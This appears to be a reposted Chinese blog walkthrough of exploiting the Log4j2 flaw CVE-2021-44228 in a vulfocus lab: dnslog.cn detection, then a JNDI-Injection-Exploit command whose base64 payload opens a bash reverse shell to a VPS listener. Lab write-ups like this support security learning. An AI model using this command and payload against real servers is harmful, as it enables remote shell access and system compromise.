log4j2漏洞利用vulfocus-CVE-2021-44228


log4j2-CVE-2021-44228

  漏洞環境是在自己搭建的vulfocus中做的。

打開漏洞環境之后,訪問鏈接。

 

 他的注入位置在/hello目錄下的一個payload位置,並且是get提交的數據。

我們直接訪問點擊這三個問號,並抓包,我們就可以在這個payload位置注入我們的exp。

 可以在dnslog.cn中獲得一個子域名,驗證一下是否存在該漏洞。

 這里需要進行url編碼一下,要不然返回404。發送,之后就可以在dnslog.cn中看到記錄。

 直接利用:用JNDI注入:(遠程方法調用)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4xMDAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.100.100

首先要下載這個exp,下載到自己的vps中,敲上面的對應命令,就會返回:下面內容。

在vps中打開一個頁面,監聽我們的對應的端口。(這里用了監聽成功的圖)

  之后就直接輸入我們的payload。注意這里的rmi,

 vps中就會反彈shell成功。

 途中查看大佬的wp: 膜拜!

https://www.cnblogs.com/loongten/p/15822195.html
 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM